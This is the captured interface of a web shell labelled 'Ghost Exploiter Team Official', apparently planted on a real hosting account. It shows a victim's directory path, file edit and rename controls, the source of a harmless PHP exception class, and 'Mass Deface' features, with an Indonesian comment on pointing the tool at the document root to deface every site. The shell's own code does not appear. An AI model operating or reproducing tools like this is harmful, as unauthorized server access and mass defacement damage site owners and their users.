webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
spatie
/
image
/
src
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CouldNotConvert.php
0.277KB
edt
ren
InvalidImageDriver.php
0.252KB
edt
ren
InvalidManipulation.php
1.192KB
edt
ren
InvalidTemporaryDirecto
...
0.494KB
edt
ren
<?php namespace Spatie\Image\Exceptions; use Exception; class InvalidImageDriver extends Exception { public static function driver(string $driver): self { return new self("Driver must be `gd` or `imagick`. `{$driver}` provided."); } }
<=Back
Liking